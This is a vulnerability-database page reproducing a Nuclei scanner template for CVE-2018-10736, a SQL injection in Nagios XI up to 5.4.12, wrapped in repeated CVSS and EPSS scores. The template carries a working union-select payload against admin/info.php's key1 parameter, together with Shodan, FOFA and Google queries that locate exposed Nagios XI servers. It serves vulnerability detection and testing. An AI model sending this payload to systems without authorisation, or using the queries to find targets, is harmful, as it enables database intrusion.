Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-10736
HistoryApr 02, 2024 - 4:06 a.m.

NagiosXI <= 5.4.12 - SQL injection

2024-04-0204:06:10
ProjectDiscovery
github.com
8
cve
nagios
sqli
cve2018

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.6 High

AI Score

Confidence

High

0.037 Low

EPSS

Percentile

91.8%

A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.
id: CVE-2018-10736

info:
  name: NagiosXI <= 5.4.12 - SQL injection
  author: DhiyaneshDK
  severity: high
  description: |
    A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.
  reference:
    - https://github.com/0ps/pocassistdb
    - https://github.com/jweny/pocassistdb
    - https://vulners.com/seebug/SSV:97266
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2018-10736
    cwe-id: CWE-89
    epss-score: 0.01861
    epss-percentile: 0.88359
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - app="Nagios-XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2018,nagios,sqli
variables:
  num: "{{rand_int(2000000000, 2100000000)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
# digest: 490a004630440220380054dbdf1f81a72097d9acc8f469ae8928137e73a3776f9c827da18c2bb79d02205f0ee05e01189342bf924f0915d1da2c211d30e28ff194c9d6576d64bc92770b:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.6 High

AI Score

Confidence

High

0.037 Low

EPSS

Percentile

91.8%

Related for NUCLEI:CVE-2018-10736